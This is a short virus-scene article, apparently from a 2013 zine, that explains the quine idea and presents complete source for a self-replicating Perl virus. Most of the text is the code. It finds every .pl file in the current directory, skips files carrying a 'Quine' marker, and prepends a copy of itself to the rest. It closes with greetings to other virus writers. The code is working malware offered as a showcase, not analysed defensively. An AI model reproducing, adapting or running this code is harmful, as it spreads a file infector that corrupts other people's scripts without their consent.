﻿                             Quine Viruses in Perl
                              roy g biv / defjam


What is it?

A  quine is a program which emits a copy of its own source code as its output.
We  can  make a variation of this technique to make a virus, which copies  its
own  source  code instead.  This is harder than printing itself.  The idea  is
source  code  infection,  well known for many years already, but we do  it  in
elegant form for the first time.  Here is the code:

$a="";                                  #place atoi(code,16) here first, begin with second '"'
$b='$a="'.$a;                           #create string declaration and append atoi entire code
for($c=0;$c<length($a);$c+=2)
{
    $b.=chr(hex(substr($a,$c,2)))       #append plaintext code
}
foreach$a(<*>)
{
    if(lc($a)=~".pl")                   #find all .pl files
    {
        open(a,$a);                     #open file
        $c=join("",<a>);                #read entire file
        close(a);
        if($c!~"Quine")                 #check for infection marker
        {
            open(a,'>'.$a);             #open file for writing
            print a$b.$c;               #write everything
            close(a)
        }
    }
}
#Quine - roy g biv 09/09/13


Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - jqwerty - Malum - Obleak - Prototype -
Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras -
uNdErX - Vallez - Vecna - Whitehead


rgb/defjam september 2013
iam_rgb@hotmail.com
